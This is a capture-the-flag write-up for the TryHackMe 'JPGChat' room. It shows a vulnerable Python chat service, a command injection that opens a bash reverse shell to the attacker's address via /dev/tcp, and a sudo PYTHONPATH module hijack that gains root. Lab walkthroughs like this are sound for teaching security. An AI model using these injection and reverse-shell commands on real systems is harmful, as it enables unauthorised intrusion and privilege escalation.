THM: JPGChat
JPGChat
Exploiting poorly made custom chatting service written in a certain language…
The picture attached with this new room is the Python symbol, so I think we can guess what the language might be.
Ports
SSH and port 3000. What’s that?
3000
Let’s try telnet:
└─# telnet 10.10.228.16 3000
Trying 10.10.228.16...
Connected to 10.10.228.16.
Escape character is '^]'.
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[MESSAGE]
Connection closed by foreign host.Oooooookkkkk.
Netcat:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc 10.10.228.16 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[MESSAGE]
There are currently 0 other users logged in
[MESSAGE]: something
[MESSAGE]: somethingelseNetcat it is then.
If we send [REPORT], we get this:
this report will be read by Mozzie-jpg
Let’s assume this is our admin, and we want to look at the source code on Github.
Google says:
No results found for “Mozzie-jpg” site:github.com.
Let’s go there directly: https://github.com/Mozzie-jpg/
Bingo. We want this.
#!/usr/bin/env python3
import os
print ('Welcome to JPChat')
print ('the source code of this service can be found at our admin\'s github')
def report_form():
print ('this report will be read by Mozzie-jpg')
your_name = input('your name:\n')
report_text = input('your report:\n')
os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)
def chatting_service():
print ('MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel')
print ('REPORT USAGE: use [REPORT] to report someone to the admins (with proof)')
message = input('')
if message == '[REPORT]':
report_form()
if message == '[MESSAGE]':
print ('There are currently 0 other users logged in')
while True:
message2 = input('[MESSAGE]: ')
if message2 == '[REPORT]':
report_form()
chatting_service()We can see that the report is vulnerable to command injection. Like so:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc 10.10.228.16 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[REPORT]
this report will be read by Mozzie-jpg
your name:
me && bash -i >& /dev/tcp/10.9.10.123/1234 0>&1
your report:For some reason this doesn’t want to give me a very nice shell, so I just use it to send myself a better one:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc -nvlp 1234 1 ⨯
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.228.16] 57436
bash: cannot set terminal process group (1688): Inappropriate ioctl for device
bash: no job control in this shell
wes@ubuntu-xenial:/$ id
id
wes@ubuntu-xenial:/$ bash -i >& /dev/tcp/10.9.10.123/1235 0>&1
bash -i >& /dev/tcp/10.9.10.123/1235 0>&1A better shell
wes@ubuntu-xenial:/$ id
id
uid=1001(wes) gid=1001(wes) groups=1001(wes)
wes@ubuntu-xenial:/$ which python
which python
/usr/bin/python
wes@ubuntu-xenial:/$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
wes@ubuntu-xenial:/$ sudo -l
sudo -l
Matching Defaults entries for wes on ubuntu-xenial:
mail_badpass, env_keep+=PYTHONPATH
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.pyWe better have a look at that script then:
#!/usr/bin/env python3
from compare import *
print(compare.Str('hello', 'hello', 'hello'))Not much to it. Let’s go!
wes@ubuntu-xenial:~$ printf 'import os\nos.system("/bin/bash")\n' >> compare.py
< 'import os\nos.system("/bin/bash")\n' >> compare.py
wes@ubuntu-xenial:~$ cat compare.py
cat compare.py
import os
os.system("/bin/bash")
wes@ubuntu-xenial:~$ chmod +x compare.py
wes@ubuntu-xenial:~$ sudo -u root PYTHONPATH=./:${PYTHONPATH} /usr/bin/python3 /opt/development/test_module.py
root@ubuntu-xenial:~# cd /root
cd /root
root@ubuntu-xenial:/root#
# etc, read flag blah blah